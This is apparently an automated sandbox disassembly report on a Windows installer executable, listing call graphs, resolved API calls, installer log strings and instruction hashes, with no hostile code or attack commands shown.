56437 47f4e8 56 API calls 56427->56437 56795 47f57c 56 API calls 56428->56795 56429 480a22 56429->56422 56792 408be0 19 API calls 56429->56792 56430 480a5d 56794 47f50c 56 API calls 56430->56794 56798 47f33c 38 API calls 56433->56798 56438 480ac1 56434->56438 56796 47f50c 56 API calls 56434->56796 56437->56424 56797 47f33c 38 API calls 56438->56797 56441 480ac8 56442 480ada 56441->56442 56443 480ae0 56441->56443 56444 480ade 56442->56444 56448 47f4e8 56 API calls 56442->56448 56443->56444 56446 47f4e8 56 API calls 56443->56446 56545 47c66c 56444->56545 56446->56444 56448->56444 56546 42d898 GetWindowsDirectoryA 56545->56546 56547 47c690 56546->56547 56548 403450 18 API calls 56547->56548 56549 47c69d 56548->56549 56550 42d8c4 GetSystemDirectoryA 56549->56550 56551 47c6a5 56550->56551 56552 403450 18 API calls 56551->56552 56553 47c6b2 56552->56553 56554 42d8f0 6 API calls 56553->56554 56555 47c6ba 56554->56555 56556 403450 18 API calls 56555->56556 56557 47c6c7 56556->56557 56558 47c6d0 56557->56558 56559 47c6ec 56557->56559 56830 42d208 56558->56830 56561 403400 4 API calls 56559->56561 56563 47c6ea 56561->56563 56565 47c731 56563->56565 56567 42c8cc 19 API calls 56563->56567 56564 403450 18 API calls 56564->56563 56810 47c4f4 56565->56810 56569 47c70c 56567->56569 56571 403450 18 API calls 56569->56571 56570 403450 18 API calls 56572 47c74d 56570->56572 56573 47c719 56571->56573 56574 47c76b 56572->56574 56575 4035c0 18 API calls 56572->56575 56573->56565 56577 403450 18 API calls 56573->56577 56576 47c4f4 22 API calls 56574->56576 56575->56574 56578 47c77a 56576->56578 56577->56565 56579 403450 18 API calls 56578->56579 56580 47c787 56579->56580 56581 47c7af 56580->56581 56583 42c3fc 19 API calls 56580->56583 56582 47c816 56581->56582 56584 47c4f4 22 API calls 56581->56584 56586 47c8de 56582->56586 56587 47c836 SHGetKnownFolderPath 56582->56587 56585 47c79d 56583->56585 56588 47c7c7 56584->56588 56591 4035c0 18 API calls 56585->56591 56589 47c8e7 56586->56589 56590 47c908 56586->56590 56592 47c850 56587->56592 56593 47c88b SHGetKnownFolderPath 56587->56593 56594 403450 18 API calls 56588->56594 56595 42c3fc 19 API calls 56589->56595 56596 42c3fc 19 API calls 56590->56596 56591->56581 56840 403ba4 21 API calls 56592->56840 56593->56586 56600 47c8a5 56593->56600 56599 47c7d4 56594->56599 56791->56429 56793->56430 56794->56423 56795->56424 56796->56438 56797->56441 56798->56441 56811 42de1c RegOpenKeyExA 56810->56811 56812 47c51a 56811->56812 56813 47c540 56812->56813 56814 47c51e 56812->56814 56815 403400 4 API calls 56813->56815 56816 42dd4c 20 API calls 56814->56816 56817 47c547 56815->56817 56818 47c52a 56816->56818 56817->56570 56819 47c535 RegCloseKey 56818->56819 56820 403400 4 API calls 56818->56820 56819->56817 56820->56819 56831 4038a4 18 API calls 56830->56831 56832 42d21b 56831->56832 56833 42d232 GetEnvironmentVariableA 56832->56833 56837 42d245 56832->56837 56842 42dbd0 18 API calls 56832->56842 56833->56832 56834 42d23e 56833->56834 56836 403400 4 API calls 56834->56836 56836->56837 56837->56564 56842->56832
                                                                                                    Strings
                                                                                                    • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                                    • Stripped read-only attribute., xrefs: 00470EC7
                                                                                                    • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                                    • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                                    • Dest file exists., xrefs: 004709BB
                                                                                                    • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                                    • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                                    • -- File entry --, xrefs: 004706FB
                                                                                                    • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                                    • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                                    • Installing into GAC, xrefs: 00471714
                                                                                                    • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                                    • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                                    • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                                    • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                                    • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                                    • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                                    • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                                    • @, xrefs: 004707B0
                                                                                                    • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                                    • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                                    • Dest filename: %s, xrefs: 00470894
                                                                                                    • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                                    • Same version. Skipping., xrefs: 00470CE5
                                                                                                    • Will register the file (a type library) later., xrefs: 00471513
                                                                                                    • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                                    • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                                    • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                                    • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                                    • Time stamp of our file: %s, xrefs: 0047099B
                                                                                                    • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                                    • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                                    • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                                    • InUn, xrefs: 0047115F
                                                                                                    • Version of our file: (none), xrefs: 00470AFC
                                                                                                    • Version of existing file: (none), xrefs: 00470CFA
                                                                                                    • .tmp, xrefs: 00470FB7
                                                                                                    • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                                    • Installing the file., xrefs: 00470F09
                                                                                                    • Same time stamp. Skipping., xrefs: 00470D55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                    • API String ID: 0-4021121268
                                                                                                    • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                    • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                                    • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                    • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                                    APIs
                                                                                                    • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                                    • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                                    • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                    • API String ID: 2252812187-1888249752
                                                                                                    • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                    • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                                    • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                    • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmStartSession), ref: 00450309
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmRegisterResources), ref: 0045031E
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmGetList), ref: 00450333
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmShutdown), ref: 00450348
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmRestart), ref: 0045035D
                                                                                                    • GetProcAddress.KERNEL32(6E9E0000,RmEndSession), ref: 00450372
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadVersion
                                                                                                    • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                    • API String ID: 1968650500-3419246398
                                                                                                    • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                    • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                                    • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                    • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1793 423c45-423c61 call 40b24c 1791->1793 1798 423cec-423cf1 1792->1798 1799 423c8d 1792->1799 1819 423c63-423c6b 1793->1819 1820 423c70-423c72 1793->1820 1800 423cf3 1798->1800 1801 423d27-423d2c 1798->1801 1802 423c93-423c96 1799->1802 1803 423d50-423d60 1799->1803 1809 423fb1-423fb9 1800->1809 1810 423cf9-423d01 1800->1810 1804 423d32-423d35 1801->1804 1805 42409a-4240a8 IsIconic 1801->1805 1811 423cc5-423cc8 1802->1811 1812 423c98 1802->1812 1807 423d62-423d67 1803->1807 1808 423d6b-423d73 call 424194 1803->1808 1813 4240d6-4240eb call 424850 1804->1813 1814 423d3b-423d3c 1804->1814 1815 424152-42415a 1805->1815 1824 4240ae-4240b9 GetFocus 1805->1824 1821 423d78-423d80 call 4241dc 1807->1821 1822 423d69-423d8c call 423b84 1807->1822 1808->1815 1809->1815 1816 423fbf-423fca call 4181e0 1809->1816 1825 423f13-423f3a SendMessageA 1810->1825 1826 423d07-423d0c 1810->1826 1817 423da9-423db0 1811->1817 1818 423cce-423ccf 1811->1818 1827 423df6-423e06 call 423b84 1812->1827 1828 423c9e-423ca1 1812->1828 1813->1815 1831 423d42-423d45 1814->1831 1832 4240ed-4240f4 1814->1832 1829 424171-424177 1815->1829 1816->1815 1878 423fd0-423fdf call 4181e0 IsWindowEnabled 1816->1878 1817->1815 1841 423db6-423dbd 1817->1841 1842 423cd5-423cd8 1818->1842 1843 423f3f-423f46 1818->1843 1819->1829 1820->1792 1820->1793 1821->1815 1822->1815 1824->1815 1836 4240bf-4240c8 call 41eff4 1824->1836 1825->1815 1844 423d12-423d13 1826->1844 1845 42404a-424055 1826->1845 1827->1815 1837 423ca7-423caa 1828->1837 1838 423e1e-423e3a PostMessageA call 423b84 1828->1838 1847 424120-424127 1831->1847 1848 423d4b 1831->1848 1858 4240f6-424109 call 4244d4 1832->1858 1859 42410b-42411e call 42452c 1832->1859 1836->1815 1891 4240ce-4240d4 SetFocus 1836->1891 1855 423cb0-423cb3 1837->1855 1856 423ea5-423eac 1837->1856 1838->1815 1841->1815 1861 423dc3-423dc9 1841->1861 1862 423cde-423ce1 1842->1862 1863 423e3f-423e5f call 423b84 1842->1863 1843->1815 1851 423f4c-423f51 call 404e54 1843->1851 1864 424072-42407d 1844->1864 1865 423d19-423d1c 1844->1865 1845->1815 1849 42405b-42406d 1845->1849 1882 42413a-424149 1847->1882 1883 424129-424138 1847->1883 1866 42414b-42414c call 423b84 1848->1866 1849->1815 1851->1815 1873 423cb9-423cba 1855->1873 1874 423dce-423ddc IsIconic 1855->1874 1875 423eae-423ec1 call 423b14 1856->1875 1876 423edf-423ef0 call 423b84 1856->1876 1858->1815 1859->1815 1861->1815 1879 423ce7 1862->1879 1880 423e0b-423e19 call 424178 1862->1880 1906 423e83-423ea0 call 423a84 PostMessageA 1863->1906 1907 423e61-423e7e call 423b14 PostMessageA 1863->1907 1864->1815 1867 424083-424095 1864->1867 1884 423d22 1865->1884 1885 423f56-423f5e 1865->1885 1903 424151 1866->1903 1867->1815 1892 423cc0 1873->1892 1893 423d91-423d99 1873->1893 1899 423dea-423df1 call 423b84 1874->1899 1900 423dde-423de5 call 423bc0 1874->1900 1922 423ed3-423eda call 423b84 1875->1922 1923 423ec3-423ecd call 41ef58 1875->1923 1916 423ef2-423ef8 call 41eea4 1876->1916 1917 423f06-423f0e call 423a84 1876->1917 1878->1815 1924 423fe5-423ff4 call 4181e0 IsWindowVisible 1878->1924 1879->1866 1880->1815 1882->1815 1883->1815 1884->1866 1885->1815 1890 423f64-423f6b 1885->1890 1890->1815 1908 423f71-423f80 call 4181e0 IsWindowEnabled 1890->1908 1891->1815 1892->1866 1893->1815 1909 423d9f-423da4 call 422c4c 1893->1909 1899->1815 1900->1815 1903->1815 1906->1815 1907->1815 1908->1815 1937 423f86-423f9c call 412310 1908->1937 1909->1815 1935 423efd-423f00 1916->1935 1917->1815 1922->1815 1923->1922 1924->1815 1942 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1924->1942 1935->1917 1937->1815 1946 423fa2-423fac 1937->1946 1942->1815 1946->1815
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                    • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                                    • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                    • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2187 4675b4-4675bb 2181->2187 2182->2187 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2187->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2187->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2329 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2329 2321->2329 2347 467bb6-467bd1 2329->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2329->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2431 467f40-467f53 call 4145fc 2428->2431 2432 467f3d 2428->2432 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2431->2429 2432->2431 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2535 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2535 2536 4683d1-4683ee call 44ffdc call 450138 2532->2536 2549 468453 2535->2549 2550 46843b-468442 2535->2550 2536->2535 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2557 46846f-468478 2554->2557 2558 46847a-46847c 2554->2558 2556 468480-46849a 2555->2556 2559 468543-46854a 2556->2559 2560 4684a0-4684a9 2556->2560 2557->2555 2557->2558 2558->2556 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2587 468584-468598 call 403494 2563->2587 2588 468575-468582 call 47c440 2563->2588 2572 4685f0-4685f9 2564->2572 2576 4685ff-468617 call 429fd8 2572->2576 2577 468709-468738 call 42b96c call 44e83c 2572->2577 2589 46868e-468692 2576->2589 2590 468619-46861d 2576->2590 2606 4687e6-4687ea 2577->2606 2607 46873e-468742 2577->2607 2602 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2587->2602 2603 46859a-4685a5 call 403494 2587->2603 2588->2602 2596 468694-46869d 2589->2596 2597 4686e2-4686e6 2589->2597 2598 46861f-468659 call 40b24c call 47c26c 2590->2598 2596->2597 2604 46869f-4686aa 2596->2604 2609 4686fa-468704 call 42a05c 2597->2609 2610 4686e8-4686f8 call 42a05c 2597->2610 2663 46865b-468662 2598->2663 2664 468688-46868c 2598->2664 2602->2572 2603->2602 2604->2597 2614 4686ac-4686b0 2604->2614 2617 4687ec-4687f3 2606->2617 2618 468869-46886d 2606->2618 2616 468744-468756 call 40b24c 2607->2616 2609->2577 2610->2577 2622 4686b2-4686d5 call 40b24c call 406ac4 2614->2622 2641 468788-4687bf call 47c26c call 44cb0c 2616->2641 2642 468758-468786 call 47c26c call 44cbdc 2616->2642 2617->2618 2625 4687f5-4687fc 2617->2625 2626 4688d6-4688df 2618->2626 2627 46886f-468886 call 40b24c 2618->2627 2673 4686d7-4686da 2622->2673 2674 4686dc-4686e0 2622->2674 2625->2618 2636 4687fe-468809 2625->2636 2634 4688e1-4688f9 call 40b24c call 4699fc 2626->2634 2635 4688fe-468913 call 466ee0 call 466c5c 2626->2635 2656 4688c6-4688d4 call 4699fc 2627->2656 2657 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2627->2657 2634->2635 2682 468965-46896f call 414a44 2635->2682 2683 468915-468938 call 42a040 call 40b24c 2635->2683 2636->2635 2644 46880f-468813 2636->2644 2684 4687c4-4687c8 2641->2684 2642->2684 2655 468815-46882b call 40b24c 2644->2655 2679 46885e-468862 2655->2679 2680 46882d-468859 call 42a05c call 4699fc call 46989c 2655->2680 2656->2635 2657->2635 2663->2664 2675 468664-468676 call 406ac4 2663->2675 2664->2589 2664->2598 2673->2597 2674->2597 2674->2622 2675->2664 2701 468678-468682 2675->2701 2679->2655 2694 468864 2679->2694 2680->2635 2696 468974-468993 call 414a44 2682->2696 2715 468943-468952 call 414a44 2683->2715 2716 46893a-468941 2683->2716 2692 4687d3-4687d5 2684->2692 2693 4687ca-4687d1 2684->2693 2700 4687dc-4687e0 2692->2700 2693->2692 2693->2700 2694->2635 2711 468995-4689b8 call 42a040 call 469b5c 2696->2711 2712 4689bd-4689e0 call 47c26c call 403450 2696->2712 2700->2606 2700->2616 2701->2664 2706 468684 2701->2706 2706->2664 2711->2712 2730 4689e2-4689eb 2712->2730 2731 4689fc-468a05 2712->2731 2715->2696 2716->2715 2720 468954-468963 call 414a44 2716->2720 2720->2696 2730->2731 2734 4689ed-4689fa call 47c440 2730->2734 2732 468a07-468a19 call 403684 2731->2732 2733 468a1b-468a2b call 403494 2731->2733 2732->2733 2742 468a2d-468a38 call 403494 2732->2742 2741 468a3d-468a54 call 414b18 2733->2741 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2749 468a5f-468a68 2746->2749 2750 468a6a-468a74 call 42b0e4 2746->2750 2752 468a99-468abe call 403400 * 3 2747->2752 2749->2750 2753 468a79-468a88 call 414a44 2749->2753 2750->2753 2753->2752
                                                                                                    APIs
                                                                                                      • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                    • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                      • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
